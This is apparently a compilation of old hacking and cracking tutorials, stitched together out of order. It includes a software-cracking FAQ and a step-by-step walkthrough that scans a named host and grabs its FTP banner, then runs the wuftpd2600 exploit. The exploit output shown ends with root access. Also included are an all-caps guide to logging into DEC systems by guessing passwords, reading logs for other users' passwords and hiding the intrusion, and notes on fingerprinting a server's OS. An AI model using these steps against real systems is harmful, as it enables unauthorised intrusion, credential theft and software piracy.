All About Cracking

Q: Where can I get a VB Decompiler?

A: At CBE's Memberz FTP Area (for members) or search the net.



Q: I heard about SoftICE. What's that?

A: SoftICE is a powerful (but not that easy to use) debugger used for

cracking programs too.



Q: What's the difference between hacking and cracking?

A: Go bother someone else! ;)

No, seriously, Hacking is breaking into systems and getting passwords, ...

And cracking is registering softwares without a serial number and without

paying.





Well that's it!!!

I hope that you enjoyed my tutorial,

Da Cracker/CBE



Copyright (c) 1998 by Da Cracker. All rights reserved. No portions of this

document can be used without my authorisation, *except* by CBE memberz.



E-mail: searchstops@gmail.com



To join SECTOR_7, please go to http://searchstops.com/

and like our fan page









Jai Shree Raam

How to Hack Final 2011 more updates aval ASAP

Thats it... what you do from here is the matter of other how2s. You


also might be asking what is NetCat for... well some exploits require

it. Notice that above exploit used anonymous login, so if anonymous

access was disabled there, it wouldnt work. Thats why we were checking

for anonymous access at step f. If anon access was disabled, this exploit

would only work if you had a login and password to ftp to the box...

so you must read source to see how it works. Different exploits work

differently and have different syntax. This was just one easy example,

but basic prinsiple is the same.





Thats all it takes to break into a machine... Well that is if machine

is not protected or something like that. In our case machine was totaly

open on the internet hackable by anybody. There are a lot of machines

out there like this. But also a lot of protected machines that are

behind different firewalls and with different security mechanisms

installed. Stealth coordinated attack techniques will be discussed in

later documentation. Documentadion on how to remain undetected and

various other tricks of the trade will be done later too.



PS. all the above explainations should give you general idea what

crackers do to break into your network. Hopefuly you will use this

information wisely to protect your network from intrusions.

Mail me for any questions you might have.



kgb_kid 10th of May 2001 07H37

-------

email: searchstops@gmail.com

site: http://www.searchstops.com/
















Jai Shree Raam

How to Hack part 3

From the above you can see that we FTPd to 196.1.2.3 and that 196.1.2.3


is runing wu-2.6.0. We also tried loging in as "anonymous" and it was

successfull too.



g) Get exploit for this version of FTPd. go to www.hack.co.za

(daemon/ftp/ section) and get wuftpd2600.c exploit. View this exploit

code and you'll see that its coded for spesific OSs one of which is

Red Hat 6.2. Lets say that lame_box.za.net is runing Red Hat 6.2 to our

luck :) Then just compile this exploit, run it against lame_box.za.net

and it should give you root access (ie. full control of the system):

----------------------------- cut here -----------------------------



root@kgb:~/# ./wuftpd2600 -t -s 0 196.1.2.3

Target: 196.1.2.3 (ftp/): RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm

Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152



loggin into system..

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS

230-Next time please use your e-mail address as your password

230- for example: joe@kgb.za.net

230 Guest login ok, access restrictions apply.

STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]

STEP 3 : Checking if we can reach our return address by format string

STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)












STEP 5 : Sending code.. this will take about 10 seconds.

Press ^\ to leave shell

Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown

uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)



Bang! You have root!















Jai Shree Raam

How to Hack part 2

This is self explanatory... just shows open ports. You can see that


its runing FTP daemon among lots of other things. We will be targeting

this FTP daemon.



f) See what version of FTP daemon your target is running. You could

just telnet to 21st port on that host of you could ftp to that host:



"telnet 196.1.2.3 21"

or

"ftp 196.1.2.3"



Both will spit out a banner showing the version of FTP daemon like the

following:

----------------------------- cut here -----------------------------



root@kgb:~# ftp 196.1.2.3

Connected to 196.1.2.3.

220 lame_box.za.net FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.

Name (lame_box:root): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password:

230-Welcome, archive user! This is an experimental FTP server. If have any

230-unusual problems, please report them via e-mail to root@kgb.pandora.net

230-If you do have problems, please try using a dash (-) as the first character

230-of your password -- this will turn off the continuation messages that may

230-be confusing your ftp client.

230-

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp>by

root@kgb:~#














Jai Shree Raam

How to hack The Basics 2011

This is very basic text


and more advanced text will come later. Its easier to explain from

crackers perspective, so thats the way i'll do it. The following

steps are usualy taken by clueless crackers who dont know much about

anything, but they are the ones that do the most dammage...

so here it goes...




Things you need


---------------

A shell account of some kind. Usualy people jsut install Linux

in our days, but normal shell account will do. Just make sure you

can run basic programs like: nslookup, host, dig, ping, traceroute,

telnet, ssh, ftp etc. Also make sure it has GCC installed and other

dev tools, so you could compile stuff. Also helps having tools like

NMAP and NetCat. Last thing you need is exploits.



* Shell account is similar to your DOS shell, except it has different

commands and functions. Where you could get one? Your friend who has

Linux or something installed could give you a log on to his box or

maybe your ISP provides you with a shell (i doubt that very much)



* Linux is an operating system that most hackers/crackers use



* NMAP is an advanced port-scanner



* NetCat is a telnet like proggy which allows you to stream data to

specific host



* Exploits different programs, writen mainly in C, which do all the

work for you. Exploits are the progs that break into computer for

you. Where to find them? Well thats easy! http://www.hack.co.za



Weeellll... all the things above is all you need to brek into some

network! Basicaly all u need is:



a) Linux (http://www.slackware.com)

b) Nmap (http://www.insecure.org)

c) NetCat (http://www.l0pht.com/~weld/netcat/)

d) Exploits (http://www.hack.co.za)



Steps

-----

a) Install Linux and bring it on line. I'm not goanna explain how to

do this here... cause there are lots of books on this topic already.

Look in http://kgb.za.net/books/ ask me for username and password if

you dont know it yet.



b) Install nmap.

1) tar zxvf nmap.tar.gz

2) cd nmap

3) ./configure && make && make install

This is basic installation process.



c) Pick a target on line. Lets say your target is lame_box.za.net



d) Get its IP by doing "nslookup lame_box.za.net"

This will spit out the IP of the host... in our case it will be

196.1.2.3



e) See what services this host is running and hopefuly detect its

OS by doing:



"nmap -sS -O 196.1.2.3"



This command will give you output similar to the following:

----------------------------- cut here -----------------------------



root@kgb:~# nmap -sS -O 196.1.2.3



Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )

Interesting ports on lame_box.za.net (196.1.2.3):

(The 1531 ports scanned but not shown below are in state: closed)

Port State Service

21/tcp open ftp

25/tcp open smtp

80/tcp open http

111/tcp open sunrpc

113/tcp open auth

515/tcp open printer

963/tcp open unknown

1024/tcp open kdm

4444/tcp filtered krb524

6000/tcp open X11

6699/tcp filtered napster



OS guess for host: Linux 2.2.14-2.2.16



Uptime 0.160 days (since Mon Apr 30 14:51:06 2001)



Nmap run completed -- 1 IP address (1 host up) scanned in 67 seconds

root@kgb:~#

Jai Shree Raam

BASICS OF HACKING 1, 2011

WELCOME TO BASICS OF HACKING I: DEC'S. IN THIS ARTICLE YOU WILL LEARN HOW TO LOG IN TO DEC'S, LOGGING OUT, AND ALL THE FUN STUFF TO DO IN-BETWEEN. ALL OF THIS INFORMATION IS BASED ON A STANDARD DEC SYSTEM. SINCE THERE ARE DEC SYSTEM S


10 AND 20, AND WE FAVOR, THE DEC 20, THERE WILL BE MORE INFO ON THEM IN THIS ARTICLE. IT JUST SO HAPPENS THAT THE DEC 20 IS ALSO THE MORE COMMON OF THE TWO, AND IS USED BY MUCH MORE INTERESTING PEOPLE (IF YOU KNOW WHAT WE MEAN...)

OK , THE FIRST THING YOU WANT TO DO WHEN YOU ARE RECEIVING CARRIER FROM A DEC

SYSTEM IS TO FIND OUT THE FORMAT OF LOGIN NAMES. YOU CAN DO THIS BY LOOKING

AT WHO IS ON THE SYSTEM. DEC=> @ (THE 'EXEC' LEVEL PROMPT) YOU=> SY SY IS SHO

RT FOR SY(STAT) AND SHOWS YOU THE SYSTEM STATUS. YOU SHOULD SEE THE FORMAT OF

L OGIN NAMES... A SYSTAT USUALLY COMES UP IN THIS FORM: JOB LINE PROGRAM USER

JOB: THE JOB NUMBER (NOT IMPORTANT UNLESS YOU WANT TO LOG THEM OFF LATER)

LINE: WHAT LINE THEY ARE ON (USED TO TALK TO THEM...) THESE ARE BOTH TWO OR

THREE DIGIT NUMBERS. PROGRAM: WHAT PROGRAM ARE THEY RUNNING UNDER? IF IT

SAYS 'EXEC' THEY AREN'T DOING ANYTHING AT ALL... USER: AHHHAHHHH! THIS IS TH

E USER NAME THEY ARE LOGGED IN UNDER... COPY THE FORMAT, AND HACK YOURSELF OUT

A WORKING CODE... LOGIN FORMAT IS AS SUCH: DEC=> @ YOU=> LOGIN USERNAME PASS

WORD USERNAME IS THE USERNAME IN THE FORMAT YOU SAW ABOVE IN THE SYSTAT. AFTER YOU HIT THE SPACE AFTER YOUR USERNAME, IT WILL STOP ECHOING CHARACTERS

BACK TO YOUR SCREEN. THIS IS THE PASSWORD YOU ARE TYPING IN... REMEMBER,

PEOPLE USUALLY USE THEIR NAME, THEIR DOG'S NAME, THE NAME OF A FAVORITE CAR

ACTER IN A BOOK, OR SOMETHING LIKE THIS. A FEW CLEVER PEOPLE HAVE IT SET TO A

KEY CLUSTER (QWERTY OR ASDFG). PW'S CAN BE FROM 1 TO 8 CHARACTERS LONG,

ANYTHING AFTER THAT IS IGNORED. YOU ARE FINALLY IN... IT WOULD BE NICE TO

HAVE A LITTLE HELP, WOULDN'T IT? JUST TYPE A ? OR THE WORD HELP, AND IT WILL

GIVE YOU A WHOLE LIST OF TOPICS... SOME HANDY CHARACTERS FOR YOU TO KNOW

WOULD BE THE CONTROL KEYS, WOULDN'T IT? BACKSPACE ON A DEC 20 IS RUB WHICH IS

255 ON YOUR ASCII CHART. ON THE DEC 10 IT IS CNTRL-H. TO ABORT A LONG

LISTING OR A PROGRAM, CNTRL-C WORKS FINE. USE CNTRL-O TO STOP LONG OUTPUT TO

THE TERMINAL. THIS IS HANDY WHEN PLAYING A GAME, BUT YOU DON'T WANT TO

CNTRL-C OUT. CNTRL-T FOR THE TIME. CNTRL-U WILL KILL THE WHOLE LINE YOU ARE

TYPING AT THE MOMENT. YOU MAY ACCIDENTLY RUN A PROGRAM WHERE THE ONLY WAY OUT

IS A CNTRL-X, SO KEEP THAT IN RESERVE. CNTRL-S TO STOP LISTING, CNTRL-Q TO

CONTINUE ON BOTH SYSTEMS. IS YOUR TERMINAL HAVING TROUBLE?? LIKE, IT PAUSES

FOR NO REASON, OR IT DOESN'T BACKSPACE RIGHT? THIS IS BECAUSE BOTH SYSTEMS

SUPPORT MANY TERMINALS, AND YOU HAVEN'T TOLD IT WHAT YOURS IS YET... YOU ARE

USING A VT05 (ISN'T THAT FUNNY ? I THOUGHT I HAD AN APPLE) SO YOU NEED TO TELL

IT YOU ARE ONE. DEC=> @ YOU=> INFORMATION TERMINAL OR... YOU=> INFO TER THIS

SHOWS YOU WHAT YOUR TERMINAL IS SET UP AS... DEC=> ALL SORTS OF SHIT, THEN

THE @ YOU=> SET TER VT05 THIS SETS YOUR TERMINAL TYPE TO VT05. NOW LET'S SEE

WHAT IS IN THE ACCOUNT (HERE AFTER ABBREVIATED ACCT.) THAT YOU HAVE HACKED

ONTO... SAY => DIR SHORT FOR DIRECTORY, IT SHOWS YOU WHAT THE USER OF THE CODE

HAS SAVE TO THE DISK. THERE SHOULD BE A FORMAT LIKE THIS: XXXXX.OOO XXXXX IS

THE FILE NAME, FROM 1 TO 20 CHARACTE RS LONG. OOO IS THE FILE TYPE, ONE OF:

EXE, TXT, DAT, BAS, CMD AND A FEW OTHERS THAT ARE SYSTEM DEPENDANT. EXE IS A

COMPILED PROGRAM THAT CAN BE RUN (JUST BY TYPING ITS NAME AT THE @). TXT IS A

TEXT FILE, WHICH YOU CAN SEE BY TYPING= > TYPE XXXXX.TXT DO NOT TRY TO=> TYPE

XXXXX.EXE THIS IS VERY BAD FOR YOUR TERMINAL AND WILL TELL YOU ABSOLUTLY

NOTHING. DAT IS DATA THEY HAVE SAVED. BAS IS A BASIC PROGRAM, YOU CAN HAVE

IT TYPED OUT FOR YOU. CMD IS A COMMAND TYPE FILE, A LITTLE TOO COMPLICATED TO

GO INTO HERE. TRY => TAKE XXXXX.CMD BY THE WAY, THERE ARE OTHER USERS OUT

THERE WHO MAY HAVE FILES YOU CAN USE (GEE, WHY ELSE AM I HERE?). TYPE => DIR

<*.*> (DEC 20) => DIR [*,*] (DEC 10) * IS A WILDCARD, AND WILL ALLOW YOU TO

ACCESS THE FILES ON OTHER ACCOUNTS IF THE USER HAS IT SET FOR PUBLIC ACCESS.

IF IT ISN'T SET FOR PUBLIC ACCESS, THEN YOU WON'T SEE IT. TO RUN THAT PROGRAM:

DEC=> @ YOU=> USERNAME PROGRAM-NAME USERNAME IS THE DIRECTORY YOU SAW THE FILE

LISTED UNDER, AND FILE NAME WAS WHAT ELSE BUT THE FILE NAME? ** YOU ARE NOT

ALONE ** REMEMBER, YOU SAID (AT THE VERY START) SY SHORT FOR SYSTAT, AND HOW

WE SAID THIS SHOWED THE OTHER USERS ON THE SYSTEM? WELL, YOU CAN TALK TO THEM,

OR AT LEAST SEND A MESSAGE TO ANYONE YOU SEE LISTED IN A SYSTAT. YOU CAN DO

THIS BY: DEC=> THE USER LIST (FROM YOUR SYSTAT) YOU=> TALK USERNAME (DEC 20)

SEND USERNAME (DEC 10) TALK ALLOWS YOU AND THEM IMMEDIATE TRANSMISSION OF

WHATEVER YOU/THEY TYPE TO BE SENT TO THE OTHER. SEND ONLY ALLOW YOU ONE

MESSAGE TO BE SENT, AND ONLY AFTER YOU HIT . WITH SEND, THEY WILL

SEND BACK TO YOU, WITH TALK YOU CAN JUST KEEP GOING. BY THE WAY, YOU MAY BE

NOTICING WITH THE TALK COMMAND THAT WHAT YOU TYPE IS STILL ACTED UPON BY THE

PARSER (CONTROL PROGRAM). TO AVOID THE CONSTANT ERROR MESSAGES TYPE EITHER:

YOU=> ;YOUR MESSAGE YOU=> REM YOUR MESSAGE THE SEMI-COLON TELLS THE PARSER THAT

WHAT FOLLOWS IS JUST A COMMENT. REM IS SHORT FOR 'REMARK' AND IGNORES YOU

FROM THEN ON UNTIL YOU TYPE A CNTRL-Z OR CNTRL-C, AT WHICH POINT IT PUTS YOU

BACK IN THE EXEC MODE. TO BREAK THE CONNECTION FROM A TALK COMMAND TYPE:

YOU=> BREAK PRIV'S: IF YOU HAPPEN TO HAVE PRIVS, YOU CAN DO ALL SORTS OF

THINGS. FIRST OF ALL, YOU HAVE TO ACTIVATE THOSE PRIVS. YOU=> ENABLE THIS

GIVES YOU A $ PROMPT, AND ALLOWS YOU TO DO THIS: WHATEVER YOU CAN DO TO YOUR

OWN DIRECTORY YOU CAN NOW DO TO ANY OTHER DIRECTORY. TO CREATE A NEW ACCT.

USING YOUR PRIVS, JUST TYPE = > BUILD USERNAME IF USERNAME IS OLD, YOU CAN EDIT

IT, IF IT IS NEW, YOU CAN DEFINE IT TO BE WHATEVER YOU WISH. PRIVACY MEANS

NOTHING TO A USER WITH PRIVS. BY THE WAY, THERE ARE VARIOUS LEVELS OF PRIVS:

OPERATOR, WHEEL, CIA WHEEL IS THE MOST POWERFUL, BEING THAT HE CAN LOG IN FROM

ANYWHERE AND HAVE HIS POWERS. OPERATORS HAVE THEIR POWER BECAUSE THEY ARE AT

A SPECIAL TERMINAL ALLOWING THEM THE PRIVS. CIA IS SHORT FOR 'CONFIDENTIAL

INFORMATION ACCESS', WHICH ALLOWS YOU A LOW LEVEL AMOUNT OF PRIVS. NOT TO

WORRY THOUGH, SINCE YOU CAN READ THE SYSTEM LOG FILE, WHICH ALSO HAS THE

PASSWORDS TO ALL THE OTHER ACCOUNTS. TO DE-ACTIVATE YOUR PRIVS, TYPE YOU=>

DISABLE



WHEN YOU HAVE PLAYED YOUR GREEDY HEART OUT, YOU CAN FINALLY LEAVE THE SYSTEM

WITH THE COMMAND=> LOGOUT THIS LOGS THE JOB YOU ARE USING OFF THE SYSTEM

(THERE MAY BE VARIENTS OF THIS SUCH AS KJOB, OR KILLJOB). BY THE WAY, YOU CAN

SAY (IF YOU HAVE PRIVS) => LOGOUT USERNAME AFL KILLS THE USERNAME'S TERMINAL.



THERE ARE MANY MORE COMMANDS, SO TRY THEM OUT. JUST REMEMBER: LEAVE THE

ACCOUNT IN THE SAME STATE AS YOU FOUND IT. THIS WAY THEY MAY NEVER KNOW THAT

YOU ARE PLAYING LEECH OFF THEIR ACCT. NEXT TIME: THE BASICS OF HACKING II: V

AX'S (UNIX)



Jai Shree Raam

Final Step In Port Scaning

This is the stage where real hackers are differentiated between script kiddies, this is when those people who really know something prevail. Normally say if a exploit is designed to work on Linux, then if you edit its code and change its header files (if necessary), then that particular exploit can be made to run on Windows too. However, there are certain exploits, which simply would not run on a different OS than it is designed too.




Anyway, let us get back to point. You have edited the exploit code and made it compatible with your platform. Now what else? Another thing that you want to keep in mind is the Operating System, which the exploit can exploit. You see, there are certain exploits, which work only if the victim system is running a specific Operating System. For Example,



There was once a Sendmail hole, which worked only if the target System was running Sun OS without which, it simply refused to even work.



So in some cases it becomes necessary, to find out the Operating System running at the target system. Although not all exploits require the target system to be running a specific system, but why take a chance. Right?



So basically you should be aware of the following things while getting a ready to use exploit-:



1. 1.) The Daemon name and version you are trying to exploit For Example, Sendmail 8.9.4

2. 2.) The Operating System at which it is designed to run. (If necessary)

3. 3.) The operating System it requires the target system to be running. (If necessary)



That brings us to as to how to find out the Operating System running at the target system? Well, the HTTP port holds the key. Simply, telnet to Port 80 of the target system.



C:\windows>telnet xxx.bol.net.in 80



Now, once you get the input prompt, then, type an invalid HTTP command. For Example, X or Iamgreat or abc etc. Just type anything as long as it is not a valid HTTP command. Then press enter twice.



***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********



On Port 80 of my example target system, I type simply ‘ankit’ and press enter twice. This is the kind of response I get:



HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1



The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it(again not so important), but it also gives us the OS name and OS version, it is running. Wow!!! It gives hackers who want to break into their server the ultimate piece of information, which they require.



Well, these were the common ways of finding out more information about a host in your quest to break into it. I will soon be updating this manual, hope you enjoyed the first edition. Till the next update, goodbye.











Jai Shree Raam